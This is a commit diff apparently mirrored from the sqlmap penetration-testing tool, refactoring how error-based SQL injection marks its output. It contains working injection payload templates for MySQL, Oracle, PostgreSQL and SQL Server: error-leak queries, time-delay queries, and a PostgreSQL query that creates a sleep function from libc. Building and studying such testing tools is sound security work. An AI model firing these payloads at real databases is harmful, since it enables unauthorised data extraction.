mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-29 04:53:48 +03:00
nice refactoring
This commit is contained in:
parent
5d3cbec457
commit
e24bff0497
|
@ -34,10 +34,10 @@ LOGGER.addHandler(LOGGER_HANDLER)
|
||||||
LOGGER.setLevel(logging.WARN)
|
LOGGER.setLevel(logging.WARN)
|
||||||
|
|
||||||
# error based injection
|
# error based injection
|
||||||
ERROR_SPACE = "%c%c%c" % (58, 95, 58)
|
ERROR_SPACE = ":_:"
|
||||||
ERROR_EMPTY_CHAR = "%c%c%c" % (58, 120, 58)
|
ERROR_EMPTY_CHAR = ":x:"
|
||||||
ERROR_START_CHAR = "%c%c%c" % (58, 115, 58)
|
ERROR_START_CHAR = ":s:"
|
||||||
ERROR_END_CHAR = "%c%c%c" % (58, 101, 58)
|
ERROR_END_CHAR = ":e:"
|
||||||
|
|
||||||
# System variables
|
# System variables
|
||||||
IS_WIN = subprocess.mswindows
|
IS_WIN = subprocess.mswindows
|
||||||
|
|
|
@ -40,6 +40,8 @@ def errorUse(expression, resumeValue=True):
|
||||||
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
|
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.postfixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
|
startLimiter = ""
|
||||||
|
endLimiter = ""
|
||||||
|
|
||||||
if resumeValue:
|
if resumeValue:
|
||||||
output = resume(expression, payload)
|
output = resume(expression, payload)
|
||||||
|
@ -56,13 +58,15 @@ def errorUse(expression, resumeValue=True):
|
||||||
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
|
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
|
||||||
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||||
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
||||||
|
startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
|
||||||
|
endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
|
||||||
else:
|
else:
|
||||||
expressionUnescaped = unescaper.unescape(expression)
|
expressionUnescaped = unescaper.unescape(expression)
|
||||||
|
|
||||||
debugMsg = "query: %s" % expressionUnescaped
|
debugMsg = "query: %s" % expressionUnescaped
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
|
forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
|
||||||
result = Request.queryPage(urlencode(forgedPayload), content=True)
|
result = Request.queryPage(urlencode(forgedPayload), content=True)
|
||||||
|
|
||||||
match = re.search('%s(?P<result>.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
|
match = re.search('%s(?P<result>.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
|
||||||
|
|
|
@ -24,7 +24,7 @@
|
||||||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||||
<substring query="MID((%s), %d, %d)"/>
|
<substring query="MID((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||||
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(CHAR(58),CHAR(115),CHAR(58),(%s),CHAR(58),CHAR(101),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
||||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT VERSION()"/>
|
<banner query="SELECT VERSION()"/>
|
||||||
<current_user query="SELECT CURRENT_USER()"/>
|
<current_user query="SELECT CURRENT_USER()"/>
|
||||||
|
@ -91,7 +91,7 @@
|
||||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
|
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
|
||||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||||
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(115)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(58)||CHR(101)||CHR(58)||CHR(62))) FROM DUAL)"/>
|
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
|
||||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||||
<current_user query="SELECT USER FROM DUAL"/>
|
<current_user query="SELECT USER FROM DUAL"/>
|
||||||
|
@ -175,7 +175,7 @@
|
||||||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||||
<error query="%s %s=CAST(CHR(58)||CHR(115)||CHR(58)||(%s)::text||CHR(58)||CHR(101)||CHR(58) AS NUMERIC)"/>
|
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
|
||||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||||
<banner query="SELECT VERSION()"/>
|
<banner query="SELECT VERSION()"/>
|
||||||
<current_user query="SELECT CURRENT_USER"/>
|
<current_user query="SELECT CURRENT_USER"/>
|
||||||
|
@ -242,7 +242,7 @@
|
||||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||||
<error query="%s %s=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(58)+(%s)+CHAR(58)+CHAR(101)+CHAR(58)))"/>
|
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT @@VERSION"/>
|
<banner query="SELECT @@VERSION"/>
|
||||||
<current_user query="SELECT SYSTEM_USER"/>
|
<current_user query="SELECT SYSTEM_USER"/>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user